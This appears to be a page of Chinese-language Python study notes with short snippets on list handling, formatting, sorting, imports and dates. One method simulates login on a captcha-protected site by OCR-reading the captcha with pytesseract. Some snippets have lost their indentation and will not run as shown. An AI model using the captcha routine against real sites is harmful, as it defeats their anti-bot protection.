1*6=6  2*6=12 3*6=18 4*6=24 5*6=30 6*6=36
1*7=7  2*7=14 3*7=21 4*7=28 5*7=35 6*7=42 7*7=49
1*8=8  2*8=16 3*8=24 4*8=32 5*8=40 6*8=48 7*8=56 8*8=64
1*9=9  2*9=18 3*9=27 4*9=36 5*9=45 6*9=54 7*9=63 8*9=72 9*9=81

一行代碼輸出特定字符"Love"拼成的心形
print('\n'.join([''.join([('Love'[(x-y) % len('Love')] if ((x*0.05)**2+(y*0.1)**2-1)**3-(x*0.05)**2*(y*0.1)**3 <= 0 else ' ') for x in range(-30, 30)]) for y in range(30, -30, -1)]))
循環過程當中變動 list 長度是錯誤的思路
for i in range(0,len(list1)): 
if list1[i].find('a') != -1: 
   list1.pop(i) 

list1 = [x for x in list1 if 'a' not in x]
list1 = ['print', 'lock', 'china', 'page'] 

list2 = filter(lambda item: 'a' not in item,list1)

Fraction模塊:分數模塊

from fractions import Fraction
        x = Fraction(4, 6)                       # 分數類型 4/6
        x = Fraction("0.25")                     # 分數類型 1/4

加強賦值和共享引用:普通+號會生成新的對象,而加強賦值+=會在原處修改
        L = M = [1, 2]
        L = L + [3, 4]                      # L = [1, 2, 3, 4], M = [1, 2]
        L += [3, 4]                         # L = [1, 2, 3, 4], M = [1, 2, 3, 4]


 
{x**2 for x in [1, 2, 3, 4]}                         # 集合解析
"%(name1)d---%(name2)s" % {"name1":23, "name2":"value2"}

"{0}, {1} and {2}".format('spam', 'ham', 'eggs')            # 基於位置的調用
    "{motto} and {pork}".format(motto = 'spam', pork = 'ham')   # 基於Key的調用
    D = dict([('name', 'tom'), ('age', 12)])          # {'age': 12, 'name': 'tom'}
    D = dict(zip(['name', 'age'], ['tom', 12]))
    'first line' in open('test.txt')   # in測試 返回True或False
    L = [('b',2),('a',1),('c',3),('d',4)]
        sorted(L, key=lambda x: x[1], reverse=True)       # 使用Key參數和reverse參數
        sorted(L, key=lambda x: (x[0], x[1]))             # 使用key參數進行多條件排序,即若是x[0]相同,則比較x[1]
        #-- 模塊的包導入:使用點號(.)而不是路徑(dir1\dir2)進行導入
    import dir1.dir2.mod                # d導入包(目錄)dir1中的包dir2中的mod模塊 此時dir1必須在Python可搜索路徑中
    from dir1.dir2.mod import *         # from語法的包導入
    from .. import spam                 # 導入當前目錄的父目錄下的spam模塊
    from subprocess import call
call(["ls", "-l"])
    字典排序
    
    import operator
x = {1: 2, 3: 4, 4: 3, 2: 1, 0: 0}
sorted_x = sorted(x.items(), key=operator.itemgetter(1))  # dict(sorted_x)就是你想要的結果

模擬登陸有驗證碼的網站

def get_captcha(self, data, captcha_url):
    """Download the login captcha image, OCR it and return the recognised text.

    Args:
        data: form data posted to ``self.login_url`` before fetching the image.
        captcha_url: URL the captcha image is downloaded from.

    Returns:
        The non-empty string produced by ``pytesseract``. When OCR fails or
        yields nothing, the whole post/download/OCR cycle is retried.
    """
    # NOTE(review): the source had lost all indentation; the nesting below is
    # reconstructed from the statement order - confirm against the original.
    self._session.post(self.login_url, data=data)
    r = self._session.get(captcha_url)
    with open('image/captcha.gif', 'wb') as f:
        f.write(r.content)

    image = Image.open('image/captcha.gif')

    captcha = ''
    try:
        captcha = pytesseract.image_to_string(image, lang='eng')
    except Exception:
        # Best effort: an OCR failure is handled like an empty result (retry).
        pass
    if len(captcha) == 0:
        # Return the retry's result; the original discarded it and fell
        # through to return the empty string.
        return self.get_captcha(data, captcha_url)
    print('captcha:', captcha)
    os.remove('image/captcha.gif')
    return captcha

字典排序

# Named ``lst`` (the name the sorted() call below already used) so the builtin
# ``list`` is not shadowed; student names are string literals, not bare names.
lst = [
    {'student_name': 'zhangsan', 'student_score': 65},
    {'student_name': 'lisi', 'student_score': 95},
    {'student_name': 'wangwu', 'student_score': 80},
    {'student_name': 'maliu', 'student_score': 75},
    {'student_name': 'zhuqi', 'student_score': 88},
]
from operator import itemgetter
# Three highest scores, best first.
top3 = sorted(lst, key=itemgetter('student_score'), reverse=True)[:3]
# Same three students taken from an ascending sort (lowest of the three first).
print(sorted(lst, key=lambda student: student['student_score'])[-3:])

獲取下個週三的日期

def get_wednesday_date():
    """Return the date of the next Wednesday strictly after today.

    When today is itself a Wednesday the result is one week ahead.
    """
    today = date.today()
    offset = 2 - today.weekday()  # Monday is 0, so Wednesday is 2
    if offset <= 0:
        # Wednesday already reached this week: jump to next week's.
        offset += 7
    return today + timedelta(days=offset)
def get_wednesday_date():
    """Return the date of the next Wednesday strictly after today (compact form).

    When today is itself a Wednesday the result is one week ahead, matching
    the longer implementation of the same name.
    """
    today = date.today()
    # (1 - weekday) % 7 + 1 is always in 1..7: Tuesday -> 1, Wednesday -> 7.
    # The original ((2 - weekday) + 7) % 7 gave 0 on a Wednesday (today itself).
    return today + timedelta((1 - today.weekday()) % 7 + 1)
相關文章
相關標籤/搜索